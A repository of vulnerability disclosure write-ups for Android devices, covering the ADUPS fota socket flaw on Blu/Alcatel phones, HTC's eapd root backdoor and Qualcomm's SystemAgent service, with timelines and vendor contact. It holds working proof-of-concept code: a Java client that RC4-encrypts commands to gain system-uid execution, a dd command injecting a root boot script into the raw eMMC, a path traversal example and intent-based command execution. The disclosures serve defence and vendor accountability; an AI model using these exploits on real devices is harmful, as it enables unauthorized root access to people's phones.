├── .gitignore
├── GetSuperSerial.md
├── HTCPeap.md
├── QCOMSysAgent.md
└── README.md

/.gitignore:
--------------------------------------------------------------------------------
*~
#*#
.DS_Store
--------------------------------------------------------------------------------
/GetSuperSerial.md:
--------------------------------------------------------------------------------
# CVEs
CVE-2015-2231
CVE-2015-2232

## Affected Devices (tested on)
- Blu Studio 5.0c (MT6582)
- Blu Vivo Air (MT6592)
- Alcatel OneTouch Evolve2 (MT6582)
- Likely other Blu devices
- Likely other Alcatel devices
- Likely other devices using the MediaTek FOTA update service, which is called [ADUPS](http://mg.adups.cn/adups/index.html)

I have been unable to establish a proper line of communication with any of the affected vendors. Multiple emails to MediaTek addresses have resulted in radio silence; BLU claims they have no security department and cannot assist.

The Android Security team, however, has accepted the [CTS patch](https://android.googlesource.com/platform/cts/+/8a13023f463ecc0e266072863ecf23b0a559ec2f) to add an extra check for this system socket. This is very much like Jon Sawyer's previous checks, which they purposefully evaded, so let's see if they do it again.

## CVE-2015-2231 (user escalation to system)
Blu/MediaTek/ADUPS's OTA system uses the `/system/bin/fotabinder` service and the socket at `/dev/socket/fota`, which is set up by `FWUpgradeInit.rc` as follows:

```
service fotabinder /system/bin/fotabinder
    class main
    socket fota stream 600 system system
```

This script is imported inside of `init.rc`:
```
import /FWUpgradeInit.rc
```
This socket and binary are used to allow FWUpdate (package name com.adups.fota) to run system uid commands over the socket.

This is similar to CVE-2014-1600; however, the socket only allows system uid commands to be executed, and the traffic is "encrypted" using RC4 (with the key always being "system") as opposed to cleartext. The socket has also been changed, likely in an attempt to evade the CTS tests which specifically check for CVE-2014-1600. Since the key is a fixed, public string, the RC4 layer provides no authentication of the client: anyone who can reach the socket can produce a valid frame.

Using the attached POC, any application which has the INTERNET permission can connect to the socket and execute a system uid command. This issue has been assigned CVE-2015-2231.

## CVE-2015-2232 (system escalation to root)
After gaining system uid access, we can then gain root privileges by utilizing a misconfiguration of the block device permissions:
```
root@BLU STUDIO 5.0 C:/dev/block # ls -l /dev/block/mmcblk0
brw-rw---- root system 179, 0 2015-03-09 13:41 mmcblk0
```
`mmcblk0` is the raw eMMC device backing every partition, including the mounted `/system`, and `system` has complete read and write access to it. Writing through the raw device bypasses the read-only `/system` mount entirely. From here we can use CVE-2015-2231 to execute a shell script as `system` that writes to `mmcblk0` and causes a script to be executed as `root` on boot. This allows the system uid to gain root and has been assigned CVE-2015-2232. Note that the byte offset of the target script inside `mmcblk0` depends on the partition layout and the exact `/system` image, so it has to be recomputed per device and firmware build.
## Timeline
- 2015-03-01 Discovery
- 2015-03-05 Request security contact (BLU/MediaTek); CVEs requested
- 2015-03-06 CVEs assigned
- 2015-03-06 BLU responded "no security department available"
- 2015-03-09 Contact ADUPS
- 2015-03-09 Contact security@android.com
- 2015-03-10 Reply from security@android.com, assigned ANDROID-19679287
- 2015-05-01 Discussed vulnerability semi-publicly at Qualcomm Mobile Security Summit
- 2015-05-17 Test accepted by Android Security Team into CTS to look for the bad socket
- 2015-05-20 One last attempt to reach out to ADUPS/MediaTek
- 2015-05-21 Public release of doc
- 2015-05-22 MediaTek finally responds saying they were told by Google and it "should be all set"

## CVE-2015-2231 example code
```
package diff.strazzere.blukit;

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

import android.net.LocalSocket;
import android.net.LocalSocketAddress;

/**
 * Send commands to fota service and get system uid execution
 *
 * @author tim strazzere
 */
public class BluSocket {

    private byte[] buf;
    private int buflen;

    private LocalSocket mSocket;
    private InputStream mIn;
    private OutputStream mOut;

    public BluSocket() {
        buflen = 0;
        buf = new byte[0x400];
    }

    public boolean connect() {
        mSocket = new LocalSocket();

        try {
            // "fota" in the RESERVED namespace resolves to /dev/socket/fota
            mSocket.connect(new LocalSocketAddress("fota", LocalSocketAddress.Namespace.RESERVED));
            mIn = mSocket.getInputStream();
            mOut = mSocket.getOutputStream();
            return true;
        } catch (IOException e) {
            e.printStackTrace();
        }

        return false;
    }

    public void disconnect() {
        if (mSocket != null) {
            try {
                mSocket.close();
                mSocket = null;
            } catch (IOException e) {
                e.printStackTrace();
            }
        }

        if (mIn != null) {
            try {
                mIn.close();
                mIn = null;
            } catch (IOException e) {
                e.printStackTrace();
            }
        }

        if (mOut != null) {
            try {
                mOut.close();
                mOut = null;
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

    public int execute(String command) {
        return transaction(command);
    }

    public int transaction(String command) {
        if (connect()) {
            if (writeCommand(command)) {
                if (readReply()) {
                    // first four bytes of the reply body, little-endian
                    return (buf[0] & 0xFF) | ((buf[1] & 0xFF) << 8) | ((buf[2] & 0xFF) << 16) | ((buf[3] & 0xFF) << 24);
                }
            }
        }

        return -1;
    }

    public boolean writeCommand(String command) {
        // wire format: 2-byte little-endian length, then the hex-encoded RC4 ciphertext
        byte[] data = cipher(command, "system").getBytes();

        if ((data.length > 0) && (data.length < 1024)) {
            buf[0] = (byte) (data.length & 0xFF);
            buf[1] = (byte) ((data.length >> 8) & 0xFF);

            try {
                mOut.write(buf, 0, 2);
                mOut.write(data, 0, data.length);
                return true;
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
        return false;
    }

    public boolean readReply() {
        // reply uses the same framing: 2-byte little-endian length, then the body
        buflen = 0;
        if (readBytes(buf, 2)) {
            int length = (buf[0] & 0xFF) | ((buf[1] & 0xFF) << 8);
            if ((length > 0) && (length <= 1024)) {
                buflen = length;
                return readBytes(buf, length);
            } else {
                disconnect();
            }
        }

        return false;
    }

    public boolean readBytes(byte[] dest, int length) {
        try {
            if (length > 0) {
                int read = 0;
                int result = 0;
                while (read < length) {
                    // only ask for what is still missing
                    result = mIn.read(dest, read, length - read);
                    if (result < 0) {
                        break;
                    }
                    read += result;
                }

                if (read == length) {
                    return true;
                }
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
        return false;
    }

    /*
     * "crypto" -> RC4 with the string "system" as the key; the result is the
     * ciphertext as a lowercase hex string
     */
    public static String cipher(String command, String key) {
        String result = null;

        if ((command != null) && (key != null)) {
            byte[] command_bytes = command.getBytes();
            byte[] key_bytes = key.getBytes();
            byte[] array = new byte[0x100];

            // RC4 key scheduling: initialise and permute the S-box
            for (int i = 0; i < array.length; i++) {
                array[i] = ((byte) i);
            }

            if ((key_bytes != null) && (key_bytes.length != 0)) {
                int index = 0;
                int key_index = 0;
                byte tmp_byte;
                for (int i = 0; i < 0x100; i++) {
                    index = (index + ((key_bytes[key_index] & 255) + (array[i] & 255))) & 255;
                    tmp_byte = array[i];
                    array[i] = array[index];
                    array[index] = tmp_byte;
                    key_index = (key_index + 1) % key_bytes.length;
                }

                key_bytes = array;
            }

            // RC4 keystream generation, XORed with the plaintext
            array = new byte[command_bytes.length];
            int index = 0;
            int key_index = 0;
            byte tmp_byte;
            for (int i = 0; i < command_bytes.length; i++) {
                key_index = (key_index + 1) & 255;
                index = (index + (key_bytes[key_index] & 255)) & 255;
                tmp_byte = key_bytes[key_index];
                key_bytes[key_index] = key_bytes[index];
                key_bytes[index] = tmp_byte;
                array[i] = ((byte) (key_bytes[((key_bytes[key_index] & 255) + (key_bytes[index] & 255)) & 255] ^ command_bytes[i]));
            }

            command_bytes = array;

            StringBuffer buffer = new StringBuffer(command_bytes.length);
            for (byte command_byte : command_bytes) {
                buffer.append(((char) command_byte));
            }

            result = stringToHexString(buffer.toString());
        }

        return result;
    }

    private static String stringToHexString(String s) {
        String result = "";
        for (int i = 0; i < s.length(); ++i) {
            String intermediate = Integer.toHexString(s.charAt(i) & 255);
            if (intermediate.length() == 1) {
                intermediate = String.valueOf('0') + intermediate;
            }

            result = String.valueOf(result) + intermediate;
        }

        return result;
    }
}

```

## CVE-2015-2232 example code
Using CVE-2015-2231, execute a shell script like the following:

```
#!/bin/bash
dd if=/data/local/tmp/yay/inject of=/dev/block/mmcblk0 seek=252239890 bs=1 conv=notrunc
```

This injects "/data/local/tmp/shell.sh #" into the script `partition_permission.sh`, which is run by root on restart (the seek value is the offset of that script inside `mmcblk0` on the tested firmware):

```
root@BLU STUDIO 5.0 C:/ # ls -l /system/etc/partition_permission.sh
-rwxr-x--- root root 676 2014-07-28 03:12 partition_permission.sh
```

Proof of Concept
================

The POC and actual code I used for achieving root can be found in the repo [adups-get-super-serial](https://github.com/rednaga/adups-get-super-serial) (public as of Sept. 9th, 2015).
--------------------------------------------------------------------------------
/HTCPeap.md:
--------------------------------------------------------------------------------
# CVEs
- CVE-2015-5525 - Unsecured Unix socket/IPC to root process for eapd
- CVE-2015-5526 - Path traversal in eapd
- CVE-2015-5527 - Backdoor for executing shell scripts as root

## Authors
- Jon "jcase" Sawyer - jcase@cunninglogic.com
- Tim "diff" Strazzere - strazz@gmail.com

## Affected Devices (tested on)
- HTC Desire 310
- HTC Desire 310n
- HTC Desire 320
- HTC V1 (only a very limited number of firmwares)
- CAT S50 (untested, informally verified with a user of the device; hard to get hands on an actual device)
- Likely other HTC devices

## CVE-2015-5525
`init` starts the process `/system/bin/eapd`, which runs as root. This process's entire purpose is to run shell scripts as the root user. This process listens for input on a socket that is world readable and writable. This socket should be protected by stricter permissions and/or a SELinux policy (and eapd likely shouldn't exist).

```
srw-rw-rw- root system 2015-08-04 15:22 eapd
```

## CVE-2015-5526

The `eapd` process (`/system/bin/eapd`) is vulnerable to a path traversal vulnerability; when combined with CVE-2015-5525 this results in any app/user being able to execute a script as the root user. Input should be sanitized (and eapd shouldn't exist). By attaching to the `eapd` socket, which this process listens on, the user can craft a directory traversal to a file that they control.
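To make the traversal concrete, an added example in Python (not eapd's code and not the authors' PoC): it models the `snprintf(path, 0x96, "%s%s%s", "/data/data/com.cci.eapenhance/cache/", input, ".sh")` construction visible in the disassembly that follows, resolves what a traversal input actually opens, and shows the name check that would have blocked it. The traversal string is constructed, the observation about the `.sh` suffix and `snprintf` truncation is derived from the format string and size, and `safe_script_name` is an assumption about what a fix should do, not something the vendor shipped.

```python
"""Added example (not from the disclosure): models eapd's script-path
construction, the traversal it permits, and a check that would reject it."""
import posixpath

CACHE_DIR = "/data/data/com.cci.eapenhance/cache/"  # prefix from eapd's format string
PATH_MAX_EAPD = 0x96                                 # snprintf size seen in the disassembly


def eapd_script_path(name: str) -> str:
    """What eapd does: snprintf(path, 0x96, "%s%s%s", CACHE_DIR, name, ".sh").
    snprintf keeps at most size-1 characters, and nothing validates `name`."""
    return (CACHE_DIR + name + ".sh")[:PATH_MAX_EAPD - 1]


def eapd_system_command(name: str) -> str:
    """The string eapd then hands to system(): "/system/bin/sh <path>"."""
    return "/system/bin/sh " + eapd_script_path(name)


def resolved(path: str) -> str:
    """Where the kernel actually opens the file once '..' components apply;
    posixpath.normpath collapses surplus '..' at the root like the VFS does."""
    return posixpath.normpath(path)


def safe_script_name(name: str) -> bool:
    """Hardened check (assumed fix): accept only a bare file name whose final
    path still resolves to a direct child of CACHE_DIR."""
    if not name or "/" in name or "\x00" in name or name in (".", ".."):
        return False
    full = resolved(CACHE_DIR + name + ".sh")
    return full.startswith(CACHE_DIR) and posixpath.dirname(full) + "/" == CACHE_DIR


# Constructed traversal (assumption): climb out of the app's cache directory
# into a world-writable location the attacker already controls.
TRAVERSAL = "../../../../data/local/tmp/evil"

if __name__ == "__main__":
    print("eapd builds :", eapd_script_path(TRAVERSAL))
    print("kernel opens:", resolved(eapd_script_path(TRAVERSAL)))
    print("runs        :", eapd_system_command(TRAVERSAL))
    print("accepted?   :", safe_script_name(TRAVERSAL), safe_script_name("update"))
```

Two details fall out of the format string rather than the traversal itself: because `.sh` is appended, the attacker's file normally has to carry that suffix, and because `snprintf` stops at 0x95 characters, a long enough name is cut off before the suffix is added, so that constraint disappears as well.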
Simplified (from the disassembly below):
`snprintf(path, 0x96, "%s%s%s", "/data/data/com.cci.eapenhance/cache/", input, ".sh")`

```
loc_B30
LDR     R1, =(a_sh - 0xB3E)
ADD     R6, SP, #0x220+var_C4
LDR     R2, =(aSSS - 0xB42)
MOV     R0, R6                      ; char *
LDR     R3, =(aDataDataCom_cc - 0xB46)
ADD     R1, PC                      ; a_sh ; ".sh"
STR     R7, [SP,#0x220+var_220]
ADD     R2, PC                      ; "%s%s%s"
STR     R1, [SP,#0x220+var_21C]
ADD     R3, PC                      ; "/data/data/com.cci.eapenhance/cache/"
MOVS    R1, #0x96                   ; size_t
BLX     snprintf
LDR     R2, =(aScript_pathS - 0xB56)
MOV     R1, R5
MOV     R3, R6
MOVS    R0, #6
ADD     R2, PC                      ; "script_path = %s"
BLX     __android_log_print
LDR     R1, =(aR - 0xB60)
MOV     R0, R6                      ; char *
ADD     R1, PC                      ; "r"
BLX     fopen
MOV     R9, R0
CBZ     R0, loc_BAA
```

The code below then builds the string `"/system/bin/sh <path>"`, passes it to `system()`, and removes the script file afterwards; in effect:
`system("/system/bin/sh " + path)`

```
LDR     R2, =(aSS - 0xB74)
MOVS    R1, #0x96                   ; size_t
LDR     R3, =(aSystemBinSh - 0xB76)
ADD     R0, SP, #0x220+var_15C      ; char *
STR     R6, [SP,#0x220+var_220]
ADD     R2, PC                      ; "%s %s"
ADD     R3, PC                      ; "/system/bin/sh"
BLX     snprintf
LDR     R2, =(aCmdS - 0xB84)
MOV     R1, R5
ADD     R3, SP, #0x220+var_15C
MOVS    R0, #6
ADD     R2, PC                      ; "cmd========================%s"
BLX     __android_log_print
ADD     R0, SP, #0x220+var_15C      ; char *
BLX     system
MOV     R0, R9                      ; FILE *
BLX     fclose
MOV     R0, R6                      ; char *
BLX     remove
ADD     R0, SP, #0x220+var_15C      ; void *
MOVS    R1, #0                      ; int
MOVS    R2, #0x96                   ; size_t
BLX     memset
```

## CVE-2015-5527

The application `/system/app/EAP_SU.apk`, package name `com.cci.eapsu`, has an unprotected Broadcast Receiver that acts as a backdoor. This allows an unprivileged user to execute shell commands as root through `eapd` without relying on the two previous CVEs. This may be exploited from an app or adb using a broadcast containing the script in an extra named 'cmd'. The broadcast receiver should be protected with a strict permission; however, in reality EAP_SU and eapd should not exist at all, as they are outside of the normal Android permission model.

Vulnerable manifest:
```
```

Vulnerable code:
```
import java.io.File;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.SystemProperties;
import android.util.Log;

// PlatformFeatures and FileOperations are vendor classes shipped in EAP_SU.apk

public class CmdReceiver extends BroadcastReceiver {
    private final String DO_SU_CMD;
    static final String TAG = "EAP_SU";
    private String cmd;

    public CmdReceiver() {
        super();
        this.DO_SU_CMD = "com.cci.eapsu.DoSuCmd";
        this.cmd = "";
    }

    protected static boolean DoSuCmd(String script) {
        boolean ok = false;
        SystemProperties.set("ctl.stop", "my_su_command");
        Log.d("EAP_SU", "doCmdByDaemon - cmd = " + script);
        String CmdPath = "/data";
        String CmdName = "cmd.sh";
        if(PlatformFeatures.getPlatformID() == 80 || PlatformFeatures.getPlatformID() == 66) {
            CmdName = "command.sh";
        }

        // the caller-supplied script is written verbatim to /data/cmd.sh (or command.sh)
        File fileScript = new File(CmdPath, CmdName);
        if(fileScript.exists()) {
            fileScript.delete();
        }

        if(!FileOperations.writeStrToFile(fileScript.getAbsolutePath(), script, false)) {
            if(fileScript.exists()) {
                fileScript.delete();
            }

            Log.e("EAP_SU", "Write " + CmdPath + "/" + CmdName + " script Fail!!");
        }
        else {
            // ctl.start asks init to launch the my_su_command service, which runs the script as root
            SystemProperties.set("ctl.start", "my_su_command");
            ok = true;
        }

        return ok;
    }

    public void onReceive(Context context, Intent intent) {
        // no permission check: any sender of the action reaches DoSuCmd()
        if(intent.getAction().equals("com.cci.eapsu.DoSuCmd")) {
            this.cmd = intent.getExtras().getString("cmd");
            Log.d("EAP_SU", "onReceive cmd: " + this.cmd);
            CmdReceiver.DoSuCmd(this.cmd);
        }
    }
}
```
--------------------------------------------------------------------------------
/QCOMSysAgent.md:
--------------------------------------------------------------------------------
# CVEs
- No CVEs requested / none assigned; reported directly to the vendor
- Issue 1: Qualcomm SystemAgent application allows an unprivileged user to execute shell commands as the system user
- Issue 2: QSA application allows an unprivileged user to set system properties
- Issue 3: QSA application allows an unprivileged user to write strings to files as the system user
- Issue 4: QSA application allows an unprivileged user to take a screenshot of the device
- Issue 5: QSA application allows an unprivileged user to reboot the device

## Authors
- Jon "jcase" Sawyer - jcase@cunninglogic.com

## Affected Devices (tested on)
- Alcatel A564C (TCL/ALCATEL_A564C/Yaris5NA:4.4.2/KVT49L/v4FAZ-0-0:user/release-keys)
- Potentially other devices with the com.qualcomm.agent package installed

## Main (interesting) Vulnerability

Only diving directly into the interesting vulnerability, which is the Qualcomm SystemAgent application allowing an unprivileged user to execute any shell command as the system user. This application apparently was never meant to ship on production devices.

### Result
Local privilege escalation to the system user, with multiple supplementary groups, running in the system_app SELinux context.

### Overview

The Qualcomm SystemAgent application (package name `com.qualcomm.agent`) has an unsecured service (exported, no permissions required):

```
```

When `startService` is called on `SystemAgent` with the fullagent action, the service executes the intent's "para" string extra as a shell command.

```
Values.ACTION_FULL_AGENT = "android.system.fullagent";

public int onStartCommand(Intent intent, int flags, int startId) {
    // .. snip ..
    else if(Values.ACTION_FULL_AGENT.equals(intent.getAction())) {
        this.exec(intent.getStringExtra("para"));
    }

    return 1;
}

void exec(final String para) {
    new Thread() {
        public void run() {
            int maxResultLen = 0x23;
            try {
                SystemAgent.logd(para);
                // the extra is split on ',' and used directly as the argv array
                String[] paras = para.split(",");
                int i;
                for(i = 0; i < paras.length; ++i) {
                    SystemAgent.logd(i + ":" + paras[i]);
                }

                Process mProcess = Runtime.getRuntime().exec(paras);
                mProcess.waitFor();
                BufferedReader inBuffer = new BufferedReader(new InputStreamReader(mProcess.getInputStream()));
                String data = "";
                String s;
                while((s = inBuffer.readLine()) != null) {
                    data = data + s + "\n";
                }

                // stdout of the command is written to logcat in full ...
                SystemAgent.logd(data);
                int result = mProcess.exitValue();
                SystemAgent.logd("ExitValue=" + result);
                String resultProp = paras[0] + ",";
                if(result >= 0 && result != 0xFF) {
                    resultProp = data.length() > maxResultLen ? resultProp + data.substring(0, 0x23) : resultProp + data;
                }

                // ... and its first 0x23 characters are published in a system property
                AgentUtils.setSystemProperties(Values.AGENT_RESULT_PROP, resultProp);
                return;
            }
            catch(Exception e) {
                SystemAgent.logd(e);
                return;
            }
        }
    }.start();
}
```

### Proof of concept

```
ComponentName intentComponent = new ComponentName("com.qualcomm.agent", "com.qualcomm.agent.SystemAgent");
Intent serviceIntent = new Intent("android.system.fullagent");
serviceIntent.setComponent(intentComponent);
serviceIntent.putExtra("para", "/system/bin/id");
startService(serviceIntent);
```

Result from logcat:
```
D/SystemAgent( 4109): [onCreate] RUN
D/SystemAgent( 4109): [onStartCommand] 1
D/SystemAgent( 4109): [access$000] /system/bin/id
D/SystemAgent( 4109): [access$000] 0:/system/bin/id
D/SystemAgent( 4109): [access$000] uid=1000(system) gid=1000(system) groups=1000(system),1004(input),1010(wifi),1015(sdcard_rw),1021(gps),1023(media_rw),1028(sdcard_r),2002(diag),3001(net_bt_admin),3002(net_bt),3003(inet),3004(net_raw),3005(net_admin),3009(qcom_diag),41000(u0_a31000) context=u:r:system_app:s0
D/SystemAgent( 4109): [access$000] ExitValue=0
```

### Additional related vulnerabilities in SystemAgent application

More issues are found inside the method `private void doSystemActions(String para)`, which is reachable through the same service. This allows an unprivileged application/user to:
- Set system properties
- Write strings to files as the system user (writeFileAgent)
- Take a screenshot and save it to "/storage/sdcard1/logs/screenshot.png"
- Reboot the device
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# disclosures

## CVEs

- ["Get Super Serial" CVE-2015-2231 & CVE-2015-2232](https://github.com/rednaga/disclosures/blob/master/GetSuperSerial.md)

  Chain from an application with the internet permission to the system uid, then from the system uid to root. This is mainly due to an extremely weak firmware upgrade system called "ADUPS", whose vendor has failed to give any type of response. While the two specific CVEs directly correlate to a few Blu phones, it appears to be used by many other lower-end phones.

- ["HTC Peap" CVE-2015-5525, CVE-2015-5526 & CVE-2015-5527](https://github.com/rednaga/disclosures/blob/master/HTCPeap.md)

  Multiple ways to access a backdoor which allows an unprivileged application to run root commands. Discussed at the DEFCON23 Red Naga workshop on Offensive and Defensive Android Reverse Engineering.

- ["Qualcomm System Agent", No CVEs assigned](https://github.com/rednaga/disclosures/blob/master/QCOMSysAgent.md)

  Multiple vulnerabilities in an application that was never meant to be shipped on production devices. Discussed at the DEFCON23 Red Naga workshop on Offensive and Defensive Android Reverse Engineering.

- ["Blackphone 1 modem take over", CVE-2015-6841](https://www.sentinelone.com/blog/vulnerability-in-blackphone-puts-devices-at-risk-for-takeover/)

  Allows any local attacker to take over the modem, inject commands, cause denial of service and other creepy things.
  [Vendor Post](https://www.silentcircle.com/blog/blackphone-1-vulnerability-notice/), [release notes](https://support.silentcircle.com/customer/en/portal/articles/2242250-privatos-1-1-13-release-notes?b_id=4315).

- ["RESERVED", RED-2016-0029 / CVE-2016-3862]()

  Triaged by Google as Critical/Severe. RCE seems not possible on 4.2+ devices due to mitigations in place; however, a remote DoS/crash is still available without interaction. More details and CVE after the fix is released.

- ["RESERVED", RED-2016-0030 / CVE-2016-????]()

  Spot reserved for arbitrary (blind) system command execution on a newly (7/2016) released Android 6 device. Details and CVE listed after the vendor fix and assignment.
--------------------------------------------------------------------------------